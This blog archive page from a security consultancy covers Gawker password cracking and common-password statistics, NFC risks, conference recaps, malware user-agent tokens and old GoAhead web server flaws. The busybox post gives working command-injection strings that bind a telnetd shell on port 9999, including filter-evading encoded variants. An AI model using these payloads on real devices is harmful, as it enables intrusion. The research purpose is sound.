Category Archives: Techno
When I heard about Gawker getting compromised I knew it was not going to be pretty. Particularly with regards to their password database. Once again, the ugly warts of shared secret authentication systems are brought to the headlines. We got our hands on a copy of the password database. For reasons only Gawker administration know at this point the database only has traditional DES crypt style hashes (yes, that DES). Ideally every password for a web application user is stored using a random salt per password (at least 4 bytes for good measure) and a safe hash algorithm, like SHA1. That’s it. (See the end of this post for a better recommendation that should be considered the end goal) Storing passwords securely is not difficult, you just have to know what to do and believe it is important enough to do it. What you are about to read would not be possible if this simple guideline was followed.
There are a few lessons we can learn from this that I think are instructive for anyone that has to store user passwords and authenticate users:
- The top 100 passwords you NEVER want to allow your users to select.
- How to properly store passwords and how to construct a password policy.
First, the technical details of how we proceeded: I have about 14-16 cores I can dedicate to password cracking spread across about six machines. They are all fairly beefy, but not crazy. The challenge this presents is parallellzing the whole process across the network. This is where John the Ripper with the MPI patch comes in. MPI allows John to distribute the work to a large number of disparate systems, which has advantages in that any old hardware can be plugged in for the task. Each cracking node needs to run a daemon or agent that communicates with one central node that coordinates the cracking efforts.
Setting all of this up requires a bit of effort, but is not the most difficult task. Once a john –test kicks off (as shown below) properly we are off to the races with our 14 cracking nodes.
mpiexec -machinefile machines -n 14 ./john --test Benchmarking: Traditional DES [128/128 BS SSE2-16]... DONE
Many salts: 33099K c/s real, 35460K c/s virtual Only one salt: 28179K c/s real, 30031K c/s virtual
Password cracking of this nature is an embarrassingly parallel problem to solve. My crack nodes were sending a few hundred bytes per second to each other to handle the overhead of coordinating the cracking efforts. In a couple hours of cracking we were able to crack about 160,000 passwords:
166166 password hashes cracked, 581986 left
This means approximately 22% of the passwords were recovered on short order. All of these users that reuse passwords are now at severe risk. Additionally, time and time again, the #1 worst password is “123456″ by a wide margin. Taking out my copy of the book “Perfect Passwords” and pulling up their top 500 worst passwords of all times shows the following passwords as the 11 worst:
Perfect Passwords Top 11
123456 password 12345678 1234 pussy 12345 dragon qwerty 696969 mustang letmein
OK, so I cheated that is actually 11 passwords. Now, here are the top 11 from the Gawker dump (number on the left is number of occurences):
Gawker Top 11
4162 123456 3332 password 1444 12345678 861 lifehack 765 qwerty 529 abc123 503 12345 471 monkey 439 111111 410 consumer 391 letmein
Notice that number 11 is exactly the same? And that number 1 and 2 and 3 are exactly the same? This keeps happening….. over and over. The old saying, “creatures of habit” comes to mind. We are letting our users down by letting them pick these passwords. We are also letting our users down by not protecting their secrets better.
I could dig into the statistics and interesting features of these passwords (and there is a lot to dig into here), but the real lesson here is that you should never store passwords in a recoverable format like this. If you have a number of passwords like this you need to run, not walk, to the design board and find a way to fix it ASAP. Also, consider disallowing users from picking any password in the gawker password database. Every last one you can recover. Don’t let your users use a single one of those!
A few updates: WSJ has good coverage of this topic as well.
Also, our suggestion at the top for password storage is a bare minimum recommendation. You should be using something like bcrypt that is several orders of magnitude more difficult to crack. Another option is to roll your own, but you really should not. The key idea is you need something that takes a lot of time (for a computer). 100-300 milliseconds on your hardware, but this depends on the time vs. performance trade offs you can tolerate. Even 10ms is better than a few microseconds. There are several schemes to do this, they generally repeat multiple rounds of their core algorithm (something that really mixes the data up). The key idea is to make password recovery very slow by forcing an attacker to perform some expensive operation a variable number of times for just one candidate password attempt. Read this article on Unix crypt and then read this article to become even better informed.
(Link to [download id="267" format="2" autop="false"] for the curious)
That is it for now, thanks to fellow Intrepidus consultant Jason Ross for doing some of this footwork!
Answer: …at the end of this post.
There as been a great deal of buzz about “contactless shopping” being enabled in the next generation of cell phones here in the United States. Google will be including APIs for this in Android 2.3 “Gingerbread” and rumors are it will be in the iPhone 5. The technology used is called “Near Field Communication” (NFC), which is an extension of ISO/IEC 14443 (proximity cards… like the badge you probably have to use to get into your office). On the techie side, these guys operate at 13.56 MHz and communicate via magnetic field induction which should have a range of up to 10 or 20 centimeters… more on that later.
The main way we will probably see NFC used is to enable phones to interact with physical tags (passive) or readers (active) when your phone comes within the few centimeter range. These passive tags could ask your phone to perform a task like launch a URL, send an SMS message, store a contact, or anything else you can communicate in a few kilobytes of data. If you tap on active reader, it may try to use Peer-to-Peer mode and a create a bidirection communication channel. It might then try to have you interact with a custom application on your device or even ask your device to send data back. The way NFC has been implemented in previous mobile phones is that the phone’s NFC reader is always active unless the phone is in a standby or airplane type mode.
The wireless protocol itself is not encrypted, thus the communication is susceptible to eavesdropping and then replay attacks by other near by devices. There has been discussion about how to add encryption, but this is not currently part of the standard. You can also introduce rogue tags and readers, however there is a NFC Signature specification for NFC data exchange format records (NDEF) which tries to address this issue. Unfortunately the specification does not address the public key infrastructure (PKI) behind this or the certificate verification and revocation process. You may be interested in some real world fun Collin Mulliner has had with passive tag spoofing and NFC device fuzzing.
So a large part of NFC security will be the range in which the device can be used. Immediately I wondered how much of previous RFID extended range research from people like Chris Paget would apply here. One of the key things to keep in mind is that the NFC RFID spec operates at 13.56 MHz and in a slightly different way than the 900 MHz RFID protocol. The 900 MHz type of RFID communicates information using backscatter (and from tag to reader only). The NFC spec uses induction to modulate a signal, thereby communicating data back to the host. Because the NFC circuit needs to be powered, the read range is greatly reduced. The RF power which reaches the tag drops off by approximately the distance squared. The read range of the NFC spec is up to 10-20 cm whereas the read range of the 900 MHz spectrum RFID tags has be pushed to hundreds of meters. However, it is possible to eavesdrop on NFC communication at a greater distance. The distance depends on several factors (including the power transmitted by the NFC reader, characteristics of the eavesdropping antenna, and material between the eavesdropper and the legitimate transaction) but is on the order of 1 meter for passive tags.
Are we going to need faraday caged cell phone holsters to stop people from pulling out our credit card data when we’re packed tightly on a subway ride? Hopefully not, but that’s going to depend on how mobile applications and operating systems are written to handle NFC.
History Answer: George Santayana and the saying: “Those who cannot remember the past are condemned to repeat it.”
- benn, higb, and mxs
I was aiming not to be the last contributor to this series, given that I’ve already received my proper lashings for slagging on posts as is. But, here’s my attempt at summarizing my experience in Las Vegas for BlackHat USA 2010, DEFCON 18, and the second Security B-Sides Las Vegas. I’ll scribble here what I can actually remember amidst the scorching blaze that is Vegas during the day, and the tiring, mind-scrambling, party-filled nights.
I actually caught the “System DNS Vulnerabilties and Risk Management” panel during the first day of BlackHat. Admittedly, I was expecting something beyond trumpeting about DNSSEC, though that’s…effectively…what the description of the panel was. *sigh* Anyway, the panelists explained the progress made with DNSSEC, explained some of the timelines for signing additional TLDs, what [we] should be on the lookout for, and even took a few good questions. One of the more intriguing inquiries from the audience was centered around emulating root nameservers in a completely isolated test lab. I wish I could recall what the exact response was, but that was right at the tail end of the panel and people were shuffling out. All-in-all, ‘okay’ session. (Really, though <fanboi> I just wanted to hear more from Whitfield Diffie </fanboi>.)
I also attended “These Aren’t the Permission You’re Looking For”, presented by my pal Anthony Lineberry, and his cohorts at Lookout, David Luke Richardson and Tim Wyatt. As someone who spends quite a bit of time on the Android platform, this session piqued my interest. I expected the usual rigmarole, introduce Android, the security model, how permissions work, message passing, etc., and I was on target. That part of the talk was very familiar to me, so I nodded along in step. Eventually, the talk shifted gears, discussing how applications can sidestep requesting certain permissions (such as fine-grained / GPS location data) simply by scraping those data from the logs, which requires only asking for the READ_LOGS permission (as my colleague, Corey, said in a previous blog post). Additionally, they discussed a means of exfiltrating certain data with zero permissions — by simply invoking the web browser (via an Intent), pointing to an attacker controlled web server, and sending device information and, in a few special cases, location data (IIRC, this was due to an issue in a third-party app).
The third, and final, talk I attended at Black Hat was “Harder, Better, Faster, Stronger: Semi-Auto Vulnerability Research” by Lurene Grenier (a.k.a. “pusscat”) and Richard Johnson. While certainly a bit dry to most of the audience (and even to me in a few spots), I was pretty excited about the concepts presented. The presenters basically laid out a workflow for finding, logging, archiving, and triaging bugs, and re-evaluating previously discovered bugs — constantly (in fact, one of the ideas presented was “constantly fuzzing”). Much emphasis was given to post-processing of bugs discovered during, say, the fuzzing process. Richard Johnson also presented a set of tools, including one called “MoFlow” (IIRC, and that actually may have been the collective name), to help assist this process. Pusscat also showed off, briefly, a snapshot of a web interface that controlled and monitored distributed fuzzing/test processes. Cool stuff.
Security B-Sides Las Vegas
I didn’t actually attend the second day of BlackHat, but instead headed over to 2810 East Quail Ave., where lies a beautiful estate (with a gajillion [yes, a gajillion] pools). It also happened to be the venue for Security B-Sides Las Vegas. Surrounded by a ton of familiar faces, food, beer, and other refreshments, I chilled out for a bit before giving my own presentation, “It Melts In Your Hand: An Overview of Security (Failures) In Mobile Applications”. Through the nebulous haze of sleep deprivation, I managed to pull it off well enough (I think), and even answered some questions in a mildly coherent manner. After that, it was back to Caesars Palace to prepare for the Security Twits party.
Admittedly, my colleagues have done a better job of summarizing DEFCON than I can at this point. I spent most of my time in the “hallway track”, chatting up friends, old and new, about a myriad of things, ranging from hacking to Club Mate (blah). Also, I spent an inordinate amount of time getting my butt kicked in the Ninja Networks badge “game”. Notice I’m still a Level 1.
On the final day of DEFCON, I did manage to attend a panel about…wait for it…PCI. Yes. A PCI panel at DEFCON. And wouldn’t ya know it, it was packed. The panelists focused mainly on the pain points of PCI, the numerous misinterpretations and sheer laziness by merchants and service providers, and how we can all hope to effect change. Incidentally, the Q&A session following the panel, while in a smaller room (still packed, of course) was even more emotionally charged and powerful than the panel itself.
Here’s to more hax, more partying, and maybe even a bit of recovery.
Zach at the Adobe Haters Ball (photo by Stephen Ridley)
Hey, this is Max Sobell and I’ve been interning with Intrepidus Group this past summer. I just got back from my first Blackhat/Defcon with IG a few days ago. Corey summed up quite a few of the really good talks but there was one more that was particularly interesting. The WiMAX Hacking (https://groups.google.com/group/wimax-hacking) talk, from Pierce, Goldy, and aSmig feat. sanitybit was great.
For those of you who aren’t familiar with WiMAX, it’s a wireless broadband technology being deployed (and spreading rapidly) by Clearwire (and others, though Clearwire has the largest network). The team’s research was done on the Clear network, which Time Warner, Comcast, and Sprint all re-brand, though it is the same physical network. One thing I really liked in the talk was the emphasis on the hardware hacks and jailbreaks. They combined some hardware hacking with some VPN tricks to own a couple WiMAX devices and the captive portal page. The team was able to send fragmented packets though OpenVPN on UDP/53 without actually logging into the portal to get free WiMAX. Unfortunately, the downside is that the Location Based Services (LBS) from Clearwire (currently not very accurate and can’t be turned off) allow anyone bumming off the network to be tracked down by fellow users via a development key. One thing that confused the audience was the speakers didn’t qualify what they meant by LBS. In the context of their talk, they were talking about traditional signal strength analysis and antenna orientation. What was not mentioned is that these 4g WiMAX cellular radios also have a real GPS radios which is a requirement of E911. I would assume that the carrier has the ability to locate a device within meters based on the GPS radio.
Friday morning Corey, Mike, and I played in the Hack Cup soccer games on the Goal++ team along with DC Campbell, DC’s friend Judd, and Adam Pridgen. We sustained some early injuries, which left Mike scooting around the Riviera for the rest of the week in a motorized cart, but made it to the semi-finals with no subs. Unfortunately after that we had to stop playing because we lost DC to the airport and Judd had to go back to work. But watch out next year, Goal++ will be back! A big thanks to Nico Waisman for organizing the tournament and to Immunity for sponsoring it.
That’s it from me!
Can you tell if a host is remotely infected just by a single HTTP request? For some malware the answer is yes.
By now, I think our readers are pretty familiar with PhishMe. As you can imagine, we see a lot of hits to PhishMe from a variety of browsers. And even better, we see a lot of hits to PhishMe from a variety of browsers where the user is likely to click on things. Each time a user makes a requests a website, the user’s browser sends a “user-agent” string to the web server as part of the request. A simple user-agent string looks like:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Here’s a quick break down of what this string tells us. The Mozilla/4.0 portion indicates a Mozilla-based browser. This user is running Internet Explorer 7.0 and Windows NT 5.1 (Vista). You can check your user-agent here.
Now for Internet Explorer, it’s pretty easy to append information to this user-agent string by editing the registry. You will typically see a number of .NET related items coming from a normal user-agent header on a Windows system.
Where it gets interesting is when we see user-agents like these next ones. It seems that some viruses and malware (or “potentially unwanted software”) insert their name or a token into the user-agent string. Here’s some examples we found:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; AntivirXP08; .NET CLR 1.1.4322) Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; PeoplePal 7.0; .NET CLR 2.0.50727) Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
If the malware instead appends a token to the user-agent string, this token could be used to track the user from site to site or to trigger certain behavior on malicious websites. We identified several pieces of potentially unwanted software and tallied the number of infected users using PhishMe. The graph below shows the most common pieces of malware found in user-agent strings:
We looked at IE 6, 7, and 8. Using this total number of “infected” users, we broke down the infections into browser version and divided by the total number of users running each browser version to get the percentage of each version’s population which is infected. As it turns out, the portion of infections is pretty similar across all IE versions. Isn’t IE 8 suppose to protect users much more than IE 6? This is a bit of a surprise, but suggests something we’ve known about the current state of attacks. You can have strong software controls, but security still depends as much on the user operating the software safely. Even given a browser that is relatively hardened against threats, users must know how to identify sites with malware and phishing schemes in order to stay safe. Patching and updates are important, but so is user awareness.
PhishMe clients can contact our support team for an analysis of your user base.
Meet my new favorite web server, the GoAhead WebServer. We’ve been playing around with a handful of embedded devices recently and most developers now give you some sort of web interface to configure them over. Turns out we’ve been seeing a lot of them with GoAhead’s web server, which hasn’t had an official update from the vendor since 2003. This tiny guy is written in C and the source code is downloadable (although you do need a license).
While some vendors have highly customized the server, others are running it fairly as-is with just including their own customized Active Server Pages (ASP). What is interesting from a security stand point is that a number of recent devices we’ve seen are still using old versions of the web server. Old versions that include vulnerabilities like “%5C” directory transversal attacks and changing the file extensions of a request from “.asp” to “.as%70″ to view the server side source. DoS attacks are likely to work (although I think that can be a difficult issue for any embedded web server) and you are also likely to find CSRF attacks against the applications running on this web server since developers will need to roll their own mitigation control for this. Here’s a link to the release notes with security fixes from the latest version of the GoAhead WebServer, updated December 2, 2003.
We are all aware how important patching systems can be. My home NAS device got a firmware update a few months ago that I applied. However, even though it’s up-to-date with my vendor, it’s still vulnerable to some issues which are over six years old because they haven’t patched the code from their vendor. So take a look at your embedded device and don’t be afraid to lob some 2003 sauce at them. You might find that it still works.
If you havent been over to XKCD to see their new shell, go check it out:
guest@xkcd:/$ vi You should really use emacs. guest@xkcd:/$ WHAT Unrecognized command. guest@xkcd:/$ rm -Rf / guest@xkcd:/$ woo Unrecognized command. guest@xkcd:/$ su God mode activated. Remember, with great power comes great ... aw, screw it, go have fun.
Or rather experiencing the consequences… that, can inspire change. A perfect example; most people I know that are serious and disciplined about regular system backups do it because they’ve been burned in the past. (I’ve been very good about it ever since I paid Ontrack 1400 dollars to recover an IBM Deathstar hard drive)
How was your weekend? Mine was ok, except I spent a good part of my Sunday helping a teenage family member re-image her laptop after it was infected by some variant of the classic “pay us money to clean the virus off your computer” (see fake Security Essentials post here: http://blogs.technet.com/mmpc/archive/2010/02/24/if-it-calls-itself-security-essentials-2010-then-it-s-possibly-fake-innit.aspx ) This is nothing that we are not all familiar with.
The fallen laptop:
Vista Home 32bit, running as Administrator, expired Norton suite.
The Ah-Ha moment for me:
She wasn’t too upset about this. She needed a word doc for homework but could hardly take a break for texting while I was trying to find out what other important things she needed from the laptop.
Pictures? Picasa and Facebook. Email? Gmail. Music? Already on her iPod. Docs? Maybe she will use google docs from now on. SSH and PGP keys? (yeah right!) For her, a laptop is just a bridge to the Internet. Who cares about what is on the laptop? It’s just a thing that gets you to the <cringe> cloud </cringe> Is recovering your computer from the system disc every six months just the new norm?
She will be entering the workforce and on your corporate network in 2014.
The number of Linux-powered devices on the market is exploding. As this CCC paper points out, Linux is finding its way into everything – GPS units, television set tops, phones, routers, the works. That leaves a lot of hacking to be done, and this last month I got to spend some time with Intrepidus jailbreaking and exploiting some embedded devices. One big surprise I encountered was the difficulty of landing even simple command-injection vulnerabilities on embedded Linux.
I can’t believe it’s not Linux
The big problem with a lot of embedded Linux devices is they’re not really running Linux. If you haven’t heard of Busybox before, it’s the core functionality of Linux condensed into a single multi-call binary. Busybox offers embedded device developers a simple distribution of Linux without the large filesize footprint and complexity of porting a full Linux toolchain to embedded hardware. From a hacker’s perspective, an embedded Busybox install can pose some unique challenges, especially if you’re throwing your exploit “blind”, without the ability to see error messages:
- busybox’s ash shell lacks the full functionality of bash and other shells
- busybox’s available functionality depends on compile options chosen by the developers, so every device has the potential to pose unique challenges
- busybox’s implementation of most commands has slightly different functionality and different command line flags than the corresponding Linux versions
- Standard pipe-redirect callback shells often fail; in fact, I’ve never gotten a standard two-window “telnet | ash | telnet” shell to work on busybox.
What’s Command Injection?
Command injection vulnerabilities are usually some of the simplest exploits to land, requiring no assembly and only a little shell knowledge. They can occur whenever developers use user-supplied data as an argument to a shell command. This can happen in a number of ways, and writing a complete reference on all the ways this type of bug can manifest itself is a large topic; OWASP has a good writeup on programmatic (system call) command injection. This writeup isn’t about how injection works; it’s about how you can exploit injection on busybox. Here’s where things get weird.
BusyBox v1.1.3 Built-in shell (ash)
Enter ‘help’ for a list of built-in commands.
~ $ ping 127.0.0.1
ping: permission denied. (are you root?)
Busybox isn’t quite Linux! If you are attempting to find or exploit a “blind” command injection vuln and the target process is not a superuser process, using ping to “beacon” out to your attack box won’t work, because on busybox ping requires superuser privs. Telnet is a better beacon choice, as it is part of the default build process and must be manually removed.
Chaining Commands: Nothing New Here
The basics of adding execution to an input argument don’t change much with busybox’s shell:
~ $ true;echo Execution Execution ~ $ false;echo Execution Execution ~ $ true|echo Execution Execution ~ $ false|echo Execution Execution ~ $ false||echo Execution Execution ~ $ true&&echo Execution Execution ~ $ echo `echo Execution` Execution ~ $ echo $(echo Execution) Execution
The absolute easiest way to try to get access to a busybox install via command injection is telnetd. Busybox’s telnetd is different: on a normal telnetd install the “-l” flag enables line mode, but on busybox, -l specifies the command to use to challenge the user. That means if you specify the busybox shell, you get a shell without a user/pass prompt:
That’s the shortest possible string that can land a shell on a busybox system. Of course, here’s where things get tricky. If telnet is already open, this will fail; it will also fail to bind a priveleged port when run as a non-root user. Finally, if the environment does not contain a valid path value, the command will fail.
/bin/busybox telnetd -l/bin/sh -p9999
The command above will bind a telnet shell to port 9999 without a path value and without running as root. Of course, now things get difficult.
Sample exploit conditions are always easy to land and never have anything annoying in the way like character filters or buffer lengths. The real world is different; exploitation often requires circumventing limitations. As far as length goes, the commands above pretty much cover the shortest possible exploit strings. Character set limitations are a different story. Embedded device character set limitations can be pretty heavy duty, enforced by on-screen-keyboards, security character filters, and other methods. A common limitation is space-bounded copy, generated by a tokenizer which clips a supplied argument to everything up to the first instance of whitespace. Here are some ways to work around these limitations:
~ $ echo -e x7cx7cx2e ||. ~ $ printf x7cx2ex0a |.
Busybox supports evaluation of slash-escaped characters both using echo and the shell builtin printf. This can be used to encode a lot of the characters that are often stripped. Different execution methods require different levels of escaping. Here are some combinations that work; note that I have included the command “true” to show where a successful system command would lie in the overall exploit.
true|/bin/busybox telnetd -l/bin/sh -p9999 # Character set required: -/
true|eval $(printf telnetd\\x20\\x2dl\\x2fbin\\x2fsh\\x20\\x2dp9999)
# Character set required: $()\
true|eval `printf telnetd\\\\x20\\\\x2dl\\\\x2fbin\\\\x2fsh\\\\x20\\\\x2dp9999`
# Character set required: `\
If you’re attempting to jailbreak a potential busybox device, and you’re fuzzing a net-facing service, the strings above coupled with a good [&& / || / | / ; / $() / ``] regular expression should get you started; just monitor port 9999. If you manage to land on a device with the methods I’ve listed here, drop me a line and let me know how it went down. If you’re determined to drop a binary on the device a few bytes at a time, this should get you started:
eval echo -n $(echo -e -n xdexadxbexef $(printf x3ex3ex2ftmpx2fig))
Notes on Other Exploit Methods
There are plenty of ways to get onto a Unix-based system like busybox other than binding a shell, however often embedded devices have unique restrictions. Concatenating a user you control to etc passwd can silently fail on a readonly filesystem, a very common occurrence on embedded devices. Concatenating binaries from the shell requires precise knowledge of the architecture target type. And when you’re jailbreaking, failure is almost universally silent. Good luck,
several members of the Intrepidus team contributed to the technical content of this post: cbenn, 0xD1AB10, the rhodes
The OpenMoko project ( http://www.openmoko.org ) has “freed” the cell phone. OpenMoko is an open development platform with complete hardware specs (as complete as possible) that runs linux, can be recompiled from scratch from source code, and operates as a normal “unlocked” cellular device. This news isn’t new, but it is the first time I’m writing about it. The openmoko team actually released their second version of the cellphone hardware earlier this month (called GTA02 but nothing to do with the video game) with some significant new features including WiFi and accelerometers.
If you are like me, then you remember seeing the word “linux” in the hallowed directory listings of ftp.cdrom.com circa 1994 and thinking… hey what’s this new word? A few hours/days later, after borrowing a laptop from the school A/V department, getting comfy trashing the existing operating system fdisk style and loading slackware from a lot of floppy disks, you were greeted by a fully-bootable operating system that measured its speed in BogoMips and could do most of the things the computers in the Sun lab could do except that you were root (legitimately).
So now we’ve had Linux for a while, its used all over the place and is a system that people seem to have gotten pretty comfortable with. This level of ease and comfort is now available in the form of “the device you take with you everywhere” …your cellphone is now just a little linux box. Why is this cool? Because now I can talk to my friends, and ssh into my server from my cell phone (or vice versa). Oh yeah, and do all that other stuff that Linux does, like run Apache, FTP, NFS, torrent, or scan your systems with Nessus (theoretically).
The OpenMoko project has already suffered/gained from the normal Linux way of things and there are a few different distributions available. Developers being the way they are have splintered off from the official OpenMoko distribution and created their own distros already. One in particular, an “Underground” distro has even gone so far as to scrap X11 for windowing and use the framebuffer directly. The wheel gets reinvented once again. Hopefully this time with built-in battery powered spinners.
There are numerous ways this little toy could be used for security testers. Since it has both WiFi and can use the GSM networks (AT&T and T-Mobile work ok in the states), this would make a nice little remote access device. All you need to do is leave it in the proximity of a location with WiFi then dial in (pppd) from across the world or anywhere cellular data connections can go (if you don’t like the idea of being in physical proximity of your targets or aren’t good at talking to beefy security guards who wonder why your laptop is beeping.) Alternatively, since it has USB, plug into a corporate computer, then dial in from the cellular side and route through newly-befriended corporate system. The possibilities here are numerous. GPS-activated, bluetooth aware, motiondetecting wifi gprs connection machine…
All in all, a cool device. Stay tuned for fun stuff to do with it.